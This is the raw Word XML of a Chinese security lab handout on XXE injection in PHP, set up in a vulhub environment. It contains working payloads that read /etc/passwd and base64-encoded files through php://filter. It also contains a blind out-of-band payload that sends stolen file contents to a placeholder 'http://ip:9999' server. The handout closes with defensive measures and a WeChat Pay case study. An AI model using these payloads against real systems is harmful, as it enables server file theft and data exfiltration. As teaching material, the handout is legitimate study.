        <w:t>请求包中读取数据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$xml = simplexml_load_string($data);</w:t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rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//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将字符串数据解析为X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>格式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echo $xml-&gt;name;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//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输出X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件中name子元素的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="20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文件后会将结果展示出来，我们可以构造payload，引用恶意的外部实体，达到任意文件读取的目的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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 xml:space="preserve">&lt;?xml version="1.0" encoding="utf-8"?&gt;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 xml:space="preserve">&lt;!DOCTYPE root [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&lt;!ELEMENT root ANY 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 xml:space="preserve">&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt;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&lt;root&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行结果（读取/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1856740"/>
            <wp:effectExtent l="0" t="0" r="19685" b="228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5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有回显的X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞读取含有特殊字符的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在服务器根目录下存在文件/</w:t>
      </w:r>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，文件内容包含 </w:t>
      </w:r>
      <w:r>
        <w:t>&lt; &gt; &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的特殊字符：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2324100" cy="533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使用file协议直接读取该文件时，引用并不接受可能会引起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xml 格式混乱的字符(在XML中，有时实体内包含了些字符，如&amp;,&lt;,&gt;,",'等。这些均需要对其进行转义，否则会对XML解释器生成错误)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，出现如下错误：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3556000"/>
            <wp:effectExtent l="0" t="0" r="1143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80" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在后端为php的web应用中，我们可以使用php协议流读取文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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 xml:space="preserve">&lt;?xml version="1.0" encoding="utf-8"?&gt;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 xml:space="preserve">&lt;!DOCTYPE root [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&lt;!ELEMENT root ANY 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 xml:space="preserve">&lt;!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/abc"&gt; ]&gt;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&lt;root&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将文件内容base64编码后再回显。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1896110"/>
            <wp:effectExtent l="0" t="0" r="11430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base64解码后的结果即为包含特殊符号的文件内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4178300" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1270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一种更通用的处理方法：把我们读出来的数据放在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 中输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。感兴趣的同学可自行查阅资料学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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无回显的X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞读取文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该实验需要一台可以公网访问的服务器，如果没有配置个人服务器，可以在本地kali虚拟机上搭建docker并启动漏洞环境，同时将kali主机作为接收数据的“公网”服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker安装教程：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.jianshu.com/p/1b2e157f4852</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞环境搭建：</w:t>
      </w:r>
      <w:r>
        <w:t>https://github.com/vulhub/vulhub/tree/master/php/php_xxe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="48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如无法完成漏洞环境搭建过程，需将该部分实验的流程讲解清楚。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在noecho目录下，以</w:t>
      </w:r>
      <w:r>
        <w:t>simplexml_load_string.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例：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&lt;?php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$data = file_get_contents('php://input');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$xml = simplexml_load_string($data);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对接收到的X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串进行了X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析，但并没有将结果打印出来，我们无法获取到文件内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们就需要将数据进行外带，外带给我们自己的V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，从而查看到数据内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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 xml:space="preserve">&lt;!DOCTYPE convert [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&lt;!ENTITY % remote SYSTEM "http://ip/test.dtd"&gt;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%remote;%int;%send;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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.dtd</w:t>
      </w:r>
      <w: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&lt;!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>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hd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % int "&lt;!ENTITY &amp;#37; send SYSTEM 'http://ip:9999?p=%file;'&gt;"&gt;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将test</w:t>
      </w:r>
      <w:r>
        <w:t>.dtd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到自己的V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下，公网可访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在自己的V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上监听9999端口，payload发送过去后，即可接收到base64编码后的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4292600" cy="2298700"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270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由于服务器没有关闭debug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在debug信息中也能看到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7325" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="15875" b="7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80" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>整个调用过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload 中能看到连续调用了三个参数实体 %remote;%int;%send;，这就是我们的利用顺序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>%remote 先调用，调用后请求远程服务器上的 test.dtd ，有点类似于将 test.dtd 包含进来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件，然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 &amp;#37;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>我们再调用 %send; 把我们的读取到的数据发送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们的远程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vps 上，这样就实现了外带数据的效果，完美的解决了 XXE 无回显的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配合其他协议进行攻击（选做）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们刚刚都只是做了一件事，那就是通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file 协议读取本地文件，或者是通过 http 协议发出请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（无回显的X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中向我们的服务器发送H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求）</w:t>
      </w:r>
      <w:r>
        <w:t>，熟悉 SSRF 的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同学</w:t>
      </w:r>
      <w:r>
        <w:t>应该很快反应过来，这其实非常类似于 SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（学习链接：</w:t>
      </w:r>
      <w:r>
        <w:t>https://xz.aliyun.com/t/2115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ，因为他们都能从服务器向另一台服务器发起请求，那么我们如果将远程服务器的地址换成某个内网的地址，（比如 192.168.0.10:8080）是不是也能实现 SSRF 同样的效果呢？没错，XXE 其实也是一种 SSRF 的攻击手法，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF 其实只是一种攻击模式</w:t>
      </w:r>
      <w:r>
        <w:t>，利用这种攻击模式我们能使用很多的协议以及漏洞进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以要想更进一步的利用，我们不能将眼光局限于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file 协议，我们必须清楚地知道在何种平台，我们能用何种协议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17621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80" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:t>PHP在安装扩展以后还能支持的协议：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4198620" cy="35128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合理利用这些支持的协议，我们可以实现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议对</w:t>
      </w:r>
      <w:r>
        <w:t>内网主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和端口进行</w:t>
      </w:r>
      <w:r>
        <w:t>探测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；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在P</w:t>
      </w:r>
      <w:r>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中利用expect协议执行系统命令；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通过ftp协议和C</w:t>
      </w:r>
      <w:r>
        <w:t>RLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入向S</w:t>
      </w:r>
      <w:r>
        <w:t>MTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送钓鱼邮件；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Do</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击等等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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思考题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结合X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的形成原理，提出正确的防御方法。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原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>：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xml中的参数实体可以包含外部实体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导致类似文件包含的任意读漏洞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外部引用支持多种协议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提供了多种利用方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r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防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>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A. 使用开发语言提供的禁用外部实体的方法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B. 过滤用户提交的XML数据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关键词：&lt;!DOCTYPE和&lt;!ENTITY，或者，SYSTEM和PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>等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default"/>
        </w:rPr>
        <w:t xml:space="preserve">C. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>禁止服务器出网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微信支付接口曾爆出X</w:t>
      </w:r>
      <w:r>
        <w:t>XE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，请自行查阅相关文章了解漏洞形成过程。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微信支付的sdk中提供了WXPayUtil这个工具类，该类中实现了xmltoMap和maptoXml这两个方法，而这次的微信支付的xxe漏洞爆发点就在xmltoMap方法中。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该方法是为了将xml格式的字符串strXML转化为map。由于strXML可由攻击者控制，且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>程序未作任何防护措施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如禁止引用外部实体；过滤关键字符串等），导致恶意攻击者可利用外部实体注入读取服务器上的文件。当攻击者获取支付加密所用的安全密匙后，完全可以实现0元支付商品。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最根本的问题是没有做出任何防护措施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导致了直接解析外部实体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注入之后形成任意文件读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参考资料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"https://www.freebuf.com/vuls/176837.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/vuls/176837.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans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88C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22A6788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DF063"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FCDF06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C0"/>
    <w:rsid w:val="000B2887"/>
    <w:rsid w:val="000B71A7"/>
    <w:rsid w:val="000C057C"/>
    <w:rsid w:val="000E0E6C"/>
    <w:rsid w:val="000F42B2"/>
    <w:rsid w:val="001136F1"/>
    <w:rsid w:val="001214FD"/>
    <w:rsid w:val="00126FBD"/>
    <w:rsid w:val="00162C60"/>
    <w:rsid w:val="00164CA7"/>
    <w:rsid w:val="0017060A"/>
    <w:rsid w:val="00176C00"/>
    <w:rsid w:val="00197DBF"/>
    <w:rsid w:val="001A0505"/>
    <w:rsid w:val="001A3949"/>
    <w:rsid w:val="001D263D"/>
    <w:rsid w:val="001D5883"/>
    <w:rsid w:val="001D5FB4"/>
    <w:rsid w:val="0021703A"/>
    <w:rsid w:val="00222656"/>
    <w:rsid w:val="00225FE3"/>
    <w:rsid w:val="002507F1"/>
    <w:rsid w:val="00261241"/>
    <w:rsid w:val="002800E6"/>
    <w:rsid w:val="0028341A"/>
    <w:rsid w:val="002C0357"/>
    <w:rsid w:val="002E3F8B"/>
    <w:rsid w:val="00307F6F"/>
    <w:rsid w:val="00340508"/>
    <w:rsid w:val="00377957"/>
    <w:rsid w:val="00381EBB"/>
    <w:rsid w:val="003B174E"/>
    <w:rsid w:val="003B1CC2"/>
    <w:rsid w:val="003D1515"/>
    <w:rsid w:val="003F0AEF"/>
    <w:rsid w:val="00403D19"/>
    <w:rsid w:val="00413DAD"/>
    <w:rsid w:val="00421924"/>
    <w:rsid w:val="004542B3"/>
    <w:rsid w:val="004A3D4C"/>
    <w:rsid w:val="004C3A75"/>
    <w:rsid w:val="00557B0B"/>
    <w:rsid w:val="00567285"/>
    <w:rsid w:val="005678C6"/>
    <w:rsid w:val="00587F71"/>
    <w:rsid w:val="005B20F1"/>
    <w:rsid w:val="005B5433"/>
    <w:rsid w:val="005C0CE1"/>
    <w:rsid w:val="005E04C0"/>
    <w:rsid w:val="0063326B"/>
    <w:rsid w:val="00641FA7"/>
    <w:rsid w:val="006466D9"/>
    <w:rsid w:val="00647312"/>
    <w:rsid w:val="006572AC"/>
    <w:rsid w:val="0067673E"/>
    <w:rsid w:val="00681598"/>
    <w:rsid w:val="00686856"/>
    <w:rsid w:val="00694DD0"/>
    <w:rsid w:val="00697E2D"/>
    <w:rsid w:val="006D17E7"/>
    <w:rsid w:val="006F6208"/>
    <w:rsid w:val="00733DEA"/>
    <w:rsid w:val="00734E71"/>
    <w:rsid w:val="00747978"/>
    <w:rsid w:val="00766763"/>
    <w:rsid w:val="007A07F8"/>
    <w:rsid w:val="007A6C70"/>
    <w:rsid w:val="007C537F"/>
    <w:rsid w:val="007E13C2"/>
    <w:rsid w:val="007F04D3"/>
    <w:rsid w:val="007F0C40"/>
    <w:rsid w:val="00864D87"/>
    <w:rsid w:val="008730AA"/>
    <w:rsid w:val="00880CBF"/>
    <w:rsid w:val="00887832"/>
    <w:rsid w:val="008B08B4"/>
    <w:rsid w:val="008D5A58"/>
    <w:rsid w:val="008D6F8D"/>
    <w:rsid w:val="00902C99"/>
    <w:rsid w:val="00911DED"/>
    <w:rsid w:val="009269B3"/>
    <w:rsid w:val="00946EAE"/>
    <w:rsid w:val="00956363"/>
    <w:rsid w:val="00961A6F"/>
    <w:rsid w:val="00967238"/>
    <w:rsid w:val="009D277B"/>
    <w:rsid w:val="009E55F9"/>
    <w:rsid w:val="00A00E5C"/>
    <w:rsid w:val="00A16661"/>
    <w:rsid w:val="00A207CE"/>
    <w:rsid w:val="00A2606B"/>
    <w:rsid w:val="00A645E2"/>
    <w:rsid w:val="00A72E91"/>
    <w:rsid w:val="00A80DC0"/>
    <w:rsid w:val="00AA1152"/>
    <w:rsid w:val="00AD58B3"/>
    <w:rsid w:val="00AE44DE"/>
    <w:rsid w:val="00AE4525"/>
    <w:rsid w:val="00AE7655"/>
    <w:rsid w:val="00B4323B"/>
    <w:rsid w:val="00B50323"/>
    <w:rsid w:val="00B515C0"/>
    <w:rsid w:val="00B56231"/>
    <w:rsid w:val="00B67077"/>
    <w:rsid w:val="00BC0CCB"/>
    <w:rsid w:val="00BE70B3"/>
    <w:rsid w:val="00C27FE0"/>
    <w:rsid w:val="00C305C6"/>
    <w:rsid w:val="00C83EB4"/>
    <w:rsid w:val="00CC7F84"/>
    <w:rsid w:val="00CF09A5"/>
    <w:rsid w:val="00CF7D5A"/>
    <w:rsid w:val="00D1278F"/>
    <w:rsid w:val="00D23010"/>
    <w:rsid w:val="00DA1395"/>
    <w:rsid w:val="00DB59EF"/>
    <w:rsid w:val="00DC13D1"/>
    <w:rsid w:val="00DC2F8D"/>
    <w:rsid w:val="00DE5805"/>
    <w:rsid w:val="00DF2096"/>
    <w:rsid w:val="00DF52B8"/>
    <w:rsid w:val="00E04CF6"/>
    <w:rsid w:val="00E15BCA"/>
    <w:rsid w:val="00E64F86"/>
    <w:rsid w:val="00E66EE7"/>
    <w:rsid w:val="00E97E4C"/>
    <w:rsid w:val="00EC03A5"/>
    <w:rsid w:val="00EC32D3"/>
